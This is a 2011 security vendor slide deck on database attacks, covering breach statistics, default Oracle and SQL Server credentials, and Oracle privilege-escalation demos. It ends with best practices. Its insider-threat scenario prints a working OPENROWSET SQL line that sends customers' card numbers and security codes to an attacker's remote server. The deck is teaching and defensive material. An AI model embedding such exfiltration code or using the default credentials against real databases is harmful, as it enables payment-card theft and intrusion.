Anatomy of a

Database
Attack
James Bleecker Scott Campbell
Application Security, Inc. Application Security, Inc
Principal Systems Engineer Regional Sales Manager
June 9, 2011
Today’s Agenda

ƒ The Threat Landscape

ƒ Database Vulnerabilities (Quick Overview)
ƒ Database Attack Illustrations
ƒ Database Forensics
ƒ Database Security Best Practices

2 www.appsecinc.com
Some Scary Stats

519 millions records have been breached

since 2008

ƒLess than 10% of the world’s databases

are properly locked down
ƒ96% of breaches are avoidable through
simple or intermediate controls
ƒIn 2009, targeted attacks accounted for
89% of records compromised

3 www.appsecinc.com
Growing Threat

ƒ Cyber Threats are SERIOUS!

ƒ Different Sizes and Impacts

ƒ From Full Blown Attacks to Minor Disruptions
ƒ Data Breach is Most Common Outcome

ƒ Different Targets/Objectives
ƒ Financial – Steal Credit Cards and Money
ƒ Government – Steal State Secrets
ƒ Business – Industrial Espionage
ƒ Military – Cyber Warhead Attacks on Critical Defenses and
Infrastructure

4 www.appsecinc.com
Growing Threat

ƒ Private Sector
ƒ Seen a lot of Successful Attacks
ƒ TJX, Heartland, Epsilon, UCLA, etc
ƒ Three Of Four Energy Firms Had Data Breach In Last Year
ƒ Sony Online Entertainment

ƒ Government Sector
ƒ Seen a lot of Successful Attacks
ƒ Russia’s cyber attack on Georgia
ƒ Wikileaks
ƒ All US Government Agencies
ƒ All Branches of the US DoD
ƒ StuxNet

5 www.appsecinc.com
 Growing Threat

1-800-FLOWERS, AbeBooks, Air Miles (Canada), Ameriprise Financial, Ann Taylor credit card ,
Barclay's Bank of Delaware, Beachbody, Bebe Stores, Best Buy, Benefit Cosmetics, Brookstone,
Capital One, Chase, Citigroup, City Market, College Board, Crucial, Dell, Dillons, Disney
Destinations, Eddie Bauer, Eileen Fisher, Ethan Allen, Eurosport (Soccer.com), Food 4 Less,
Fred Meyer, Fry's Electronics, Hilton Honors program, Home Depot, Home Shopping Network,
J. Crew, JPMorgan Chase, Kroger, Marks and Spencer, Marriott, McKinsey Quarterly, MoneyGram,
New York & Co., QFC, Ralph's, Red Roof Inns, Ritz-Carlton, Robert Half International, Scottrade, Smith Brands,
Target, Tastefully Simple, TD Ameritrade, The Limited , TIAA-CREF, TiVo, US Bank, Verizon, Walgreen's

6 www.appsecinc.com
Growing Threat

Why Are We Losing the Cyber War?

ƒ False Sense of Security

ƒ US Government Lacks an Effective
Doctrine of Strategic Cyber Defense
ƒ Our laws, policies, and compliance
regulations are not meeting the
challenge
ƒ Undefined system of Authority
ƒ “Cyber militias” are leading vs. Federal Authority

7 www.appsecinc.com
The Enemy/Tactics
Who is behind data breaches?
- Over 70% credentialed users
- 10% business partners
- 46% insiders

What’s involved in a data breach?

ƒ 40% hacking and intrusion
ƒ 38% incorporated malicious code
ƒ 48% abuse of privileges
ƒ 15% physical threats
ƒ 2% significant error
ƒ 43% multiple vectors

8 www.appsecinc.com
Overview: Data Breaches

ƒ Organizations aren’t doing enough to protect

themselves
ƒ 81% of organizations with credit card data breaches
in 2008 failed their last PCI Assessment.
ƒ 52% of successful attacks in 2008 involved script
kiddie skills or less.
ƒ 83% required “moderate” skills or less.
ƒ 39% of ESG Survey respondents admit to assessing
database security less than twice a year
ƒ 49% of breaches in 2008 went undetected for
months!

ƒ Source: Verizon 2009 Data

9 Breach Investigation Report www.appsecinc.com
Defensive Strategy

Why FOCUS on the DATABASE?

…Because that is where 98% of Sensitive

Data is Stored 99.999% of the Time…

$7.2 MM 49% $214

average cost of Of breaches involved The average cost
a data breach stolen or default credentials per record stolen

10 www.appsecinc.com
To Make Matters Worse - Threats Are Very Real
Database Security: Recent Findings
ƒ Only 1 out of 4 databases are locked down against attacks.

Database #1 Database #2 Database #3 Database #4

Status: Status: Status: Status:
Unprotected Protected Unprotected Unprotected

Source: 2008 IOUG Data Security Report, Joe McKendrick, Research Analyst

11 www.appsecinc.com
Compliance is More Critical than Ever!

A recent, independent survey that AppSec conducted

found the following:
• Over 40% reported a failed security OR compliance
audit in the past two to three years.

• One-third of enterprise respondents failed a security

audit of some type (HIPAA, FISMA, SOX, etc.)

• Nearly 40% of respondents failed a HIPAA audit, the

second-highest rate of failure for audits. Other
common failures were internal audits, GLBA, PCI and
FISMA.
Source: Application Security, Inc./Enterprise Strategy Group (Released 12/11/08)

12 www.appsecinc.com
Database
Vulnerabilities
Common Database Threats

Database Vulnerabilities:
• Default accounts and passwords
• Easily guessed passwords
• Missing Patches
• Misconfigurations
• Excessive Privileges
---------------------------------------------------------
External Threats:
• Web application attacks (SQL-injection)
• Insider mistakes
• Weak or non-existent audit controls
• Social engineering

14 www.appsecinc.com
Database Vulnerabilities

Oracle Microsoft Sybase IBM DB2 MySQL

SQL
Server

Default & Weak

Passwords 9 9 9 9 9
Patchable
Vulnerabilities
9 9 9 9 9
9 9 9 9 9
Misconfigurations
& Excessive
Privileges

15 www.appsecinc.com
Database Vulnerabilities: Weak Passwords

ƒ Databases have their own user accounts and passwords

Oracle Microsoft Sybase IBM DB2 MySQL

SQL
Server

Default & Weak

Passwords 9 9 9 9 9

16 www.appsecinc.com
Database Vulnerabilities: Weak Passwords

ƒ Oracle Defaults (hundreds of them)

- User Account: system / Password: manager
- User Account: sys / Password: change_on_install
- User Account: dbsnmp / Password: dbsnmp
ƒ Microsoft SQL Server & Sybase Defaults
- User Account: SA / Password: null
ƒ It is important that you have all of the proper
safeguards against password crackers
because:
- Not all databases have Account Lockout
- Database Login activity is seldom monitored
- Scripts and Tools for exploiting weak passwords are widely
available
17 www.appsecinc.com
Database Vulnerabilities: Missing Patches

ƒ Databases have their own Privilege Escalation, DoS’s & Buffer

Overflows
Oracle Microsoft Sybase IBM DB2 MySQL
SQL
Server

Default & Weak

Passwords 9 9 9 9 9
9 9 9 9 9
Patchable
Vulnerabilities

18 www.appsecinc.com
Database Vulnerabilities: Missing Patches

ƒ Privilege Escalation
ƒ Become a DBA or equivalent privileged user
ƒ Denial of Service Attacks
ƒ Result in the database crashing or failing to respond to
connect requests or SQL Queries.
ƒ Buffer Overflow Attacks
ƒ Result in an unauthorized user causing the application to
perform an action the application was not intended to perform.
ƒ Can allow arbitrary commands to be executed
ƒ No matter how strongly you’ve set passwords and other
authentication features.

19
19 www.appsecinc.com
Database Vulnerabilities: Misconfigurations

ƒ Misconfigurations can make a database vulnerable

Oracle Microsoft Sybase IBM DB2 MySQL

SQL
Server

9 9 9 9 9
Default & Weak
Passwords

9 9 9 9 9
Denial of Services
& Buffer Overflows

9 9 9 9 9
Misconfigurations &
Excessive Privileges

20
20 www.appsecinc.com
Database Vulnerabilities: Misconfigurations
Misconfigurations Can Make Databases Vulnerable
Oracle
• External Procedure Service
• Privilege to grant Java permissions
• Default HTTP Applications
• Privilege to Execute UTL_FILE
Microsoft SQL Server
• Standard SQL Server Authentication Allowed
• Permissions granted on xp_cmdshell
Sybase
• Permission granted on xp_cmdshell
IBM DB2
• CREATE_NOT_FENCED privilege granted (allows logins to
create SPs)
MySQL
• Permissions on User Table (mysql.user)
21
21 www.appsecinc.com
The Database “Insider Threat”

Who are Insiders?

The CISO of one of the largest banks in the world says…

“I define insiders in three categories

1. Authorized and Intelligent
- use IT resources appropriately
2. Authorized and “stupid”
- make mistakes that may appear as malicious or fraudulent.
3. Unauthorized and Malicious
- mask either their identity or their behavior or both!

The first two categories I can identify and track with

identity management systems – the latter, I cannot!!”
22 www.appsecinc.com
Insider Attack Examples

23 www.appsecinc.com
SPIDER WEB OF DATABASE USERS, GROUPS, ROLES, AND PERMISSIONS
Legend Roles Permissions

Role has permission SUMMER INTERN

view
show all

Role inherits permissions NORMAL navigate

END USER
find

Role does not have

add new related record
permission
DATA translate
Users MANAGER ENTRY edit
& Groups
APPLICATION add existing related record
DEVELOPER
add new record

remove related record

QUALITY
reorder related record
ASSURANCE
DATABASE
ADMIN
new import

delete

PUBLIC EVP/SVP
delete found

USERS > GROUPS > ROLES

24
> PERMISSIONS www.appsecinc.com
Attacking Where The Data
Resides

Database Attacks!
Attacking Oracle: Become SYSDBA

ƒ Attack Target:
ƒ Oracle 10g Release 2
ƒ Privilege Level: Anyone with a Login
ƒ Examples: SCOTT / TIGER or Guest Account
ƒ Outcome: Complete Administrative Control!
ƒ Attacker can run any SQL as SYSDBA
ƒ Vulnerabilities Exploited:
ƒ Privilege Escalation via SQL Injection in
SYS.LT.MERGEWORKSPACE
ƒ Patched by Database Vendor:
ƒ Oracle October 2008 CPU
26 www.appsecinc.com
27 www.appsecinc.com
28 www.appsecinc.com
29 www.appsecinc.com
2905eca56a830226

30 www.appsecinc.com
Attacking Oracle: Become SYSDBA

31 www.appsecinc.com
Attacking Oracle: Become SYSDBA

ƒ Outcome: Complete Administrative Control!

ƒ Ran SQL as SYSDBA to GRANT DBA to PUBLIC

ƒ Vulnerabilities Exploited:
ƒ Privilege Escalation via SQL Injection in
SYS.LT.MERGEWORKSPACE

ƒ How Did We Do It?

ƒ Freely available exploit code!
ƒ Google: SYS.LT.MERGEWORKSPACE

32 www.appsecinc.com
Attacking Oracle: View Any Data

ƒ Attack Target:
ƒ Oracle 11g
ƒ Privilege Level: Any Login with CREATE
PROCEDURE
ƒ Outcome: Access to all Database Data!
ƒ Attacker can run any SQL as WMSYS
ƒ Vulnerabilities Exploited:
ƒ Privilege Escalation via SQL Injection in
[WM]SYS.LT.ROLLBACKWORKSPACE
ƒ Patched by Database Vendor:
ƒ Oracle April 2009 CPU
33 www.appsecinc.com
34 www.appsecinc.com
35 www.appsecinc.com
Attacking Oracle: View Any Data

The Setup:
ƒ Created a user (user1)
ƒ Granted only the privilege to login
ƒ Established that we can’t see sensitive data

We’re using the SCOTT.EMP table for this

demo… But this attack works
on any table in the database.

36 www.appsecinc.com
Attacking Oracle: View Any Data

The Attack:
ƒ Use CREATE PROCEDURE privilege to create
a function called SQLI
ƒ SQLI has code to read from SCOTT.EMP and print output to
the screen
ƒ Inject a call to SQLI into the vulnerable
DBMS_WM.ROLLBACKWORKSPACE
ƒ Watch as the data from SCOTT.EMP prints to
the screen

37 www.appsecinc.com
38 www.appsecinc.com
39 www.appsecinc.com
Attacking Oracle: View Any Data

ƒ Outcome: Access to all Database Data!

ƒ Ran SQL as WMSYS to read sensitive data

ƒ Vulnerabilities Exploited:
ƒ Privilege Escalation via SQL Injection in
[WM]SYS.LT.ROLLBACKWORKSPACE

ƒ How Did We Do It?

ƒ Freely available exploit code. Google
WMSYS.LT.ROLLBACKWORKSPACE

40 www.appsecinc.com
Attacking Microsoft SQL Server: The DataBurglar

ƒ DataBurglar is a database developer at a large retailer.

ƒ He is responsible for writing the code that accepts credit card
information from POS terminals and writes it into a database.

ƒ DataBurglar is addicted to adult chat rooms on the internet.

ƒ After spending thousands on his habit, he realizes he can’t afford to
continue, but he can’t stop.

• DataBurglar plots to clandestinely credit card

numbers from his employer’s customers.
– He’ll use those credit card numbers to buy more
time in the chat rooms.

41 www.appsecinc.com
DataBurglar’s Plan

ƒ The plan is to embed malicious code into the

database that stores customer data.
ƒ Harvest the credit card data as it is processed into
the system, rather then after the fact.

ƒ DataBurglar has control over the database while

in development, but will have no access when it
goes to production
ƒ His attack needs to send the data to him….and do
so without getting noticed.

ƒ DataBurglar will use a SQL Server database on

a development server to collect the credit cards
ƒ He will take them home on disk and delete the
records from the SQL Server every week.

42 www.appsecinc.com
The DataBurglar Attack
ƒ DataBurglar knows that the SQL OLE DB Provider is
installed on the target database server.
ƒ This means he can use the OPENROWSET function to send
data to his remote SQL Server database.

ƒ His attack is a simple line of SQL code embedded into

the transaction processing system:

INSERT INTO OPENROWSET ('SQLOLEDB','uid=sa;

pwd=qwerty; Network=DBMSSOCN;
Address=192.168.10.87,1433;', 'select * from
Customers..Info') values (@FirstName, @LastName,
@ccNumber, @ccType, @ccSecNumber, @ccExpDate)'

43 www.appsecinc.com
The Attack in Detail

OPENROWSET uses the OLE DB provider to

set up a connection to the remote database.
INSERT INTO
OPENROWSET('SQLOLEDB','uid=sa;pwd=qwerty;Network=DBMSSO
CN;Address=192.168.10.87,1433;','select * from Customers..Info')
Write the data to
values ( The attackers database is the Info table in
@FirstName, located at 192.168.10.87 the Customers
on port 1433 database…on
@LastName,
DataBurglar’s
@ccNumber, server
@ccType,
This is the information that we’re
@ccSecNumber, going to steal. Name, credit card
@ccExpDate number, expiration date, and
security code….all the good stuff
)'

44 www.appsecinc.com
 starts
small

45 www.appsecinc.com
 then
grows…

46 www.appsecinc.com
 and grows,
and grows

16,000+ credit card numbers…..that’s about $80M in Credit!!!

47 www.appsecinc.com
The Outcome

ƒ Once the application was deployed, DataBurglar collected at

least 300 credit card numbers daily
ƒ After some time DataBurglar had thousands of records in his own
SQL Server…without being noticed by anybody
ƒ During the next scheduled application update, DataBurglar
removed the attack code from the system
ƒ No trace remained on the victim’s SQL Server
ƒ The heist was a success

• When the attack was finally detected, it was

too late to do anything about it.
– Investigations, fines, firings, brand damage…..it was
bad for everyone….except the DataBurglar

48 www.appsecinc.com
Database Security Best
Practices
Database Security Life Cycle

50 www.appsecinc.com
Addressing Database Vulnerabilities
ƒ Start with a Secure Configuration
ƒ Stay Patched
ƒ Stay on top of all the security alerts and bulletins
ƒ Regularly Review User Rights and Privileges
ƒ Revoke any unnecessary access
ƒ Defense in Depth / Multiple Levels of Security
ƒ Regularly scan your databases for vulnerabilities
ƒ Fix the problems reported!
ƒ Implement database activity monitoring…
ƒ …and database intrusion detection
ƒ Especially if you can’t stay patched!
ƒ Encryption of data-in-motion / data-at-rest

51 www.appsecinc.com
Resources
ƒ Oracle
ƒ Oracle Project Lockdown
www.oracle.com/technology/pub/articles/project_lockdown/index.html
ƒ Oracle Security Checklist
www.oracle.com/technology/deploy/security/pdf/twp_security_checklist_db
_database.pdf
ƒ SANS Institute (SysAdmin, Audit, Network, Security)
ƒ Oracle Database Checklist
www.sans.org/score/checklists/Oracle_Database_Checklist.doc
ƒ Microsoft
ƒ SQL Server 2005 Security Best Practices
www.microsoft.com/technet/prodtechnol/sql/2005/sql2005secbestpract.ms
px
ƒ SQLSecurity.com
ƒ SQLSecurity Checklist
ƒ My Book!
ƒ Practical Oracle Security

52 www.appsecinc.com
Database Security Info from AppSecInc
ƒ White Papers
ƒ http://www.appsecinc.com/techdocs/whitepapers/research.shtml
ƒ SQL Server Forensics
ƒ Database Activity Monitoring
ƒ Search Engines Used to Attack Databases
ƒ Introduction to Database and Application Worms
ƒ Hunting Flaws in Microsoft SQL Server
ƒ Presentations
ƒ http://www.appsecinc.com/techdocs/presentations.shtml
ƒ Protecting Databases
ƒ Hack-Proofing MySQL, IBM DB2, Oracle9iAS
ƒ Writing Secure Code in Oracle
ƒ Addressing the Insider Threat to Database Security
ƒ Security alerts
ƒ www.appsecinc.com/resources/mailinglist.html

53 www.appsecinc.com
Thank You

Questions?
ƒ Vulnerabilities?
ƒ Locking down the
database?
Email our security
experts at:
asktheexpert@appsecinc.com

ƒ Scott Campbell
ƒ 214-435-2772
ƒ scampbell@appsecinc.com

54 www.appsecinc.com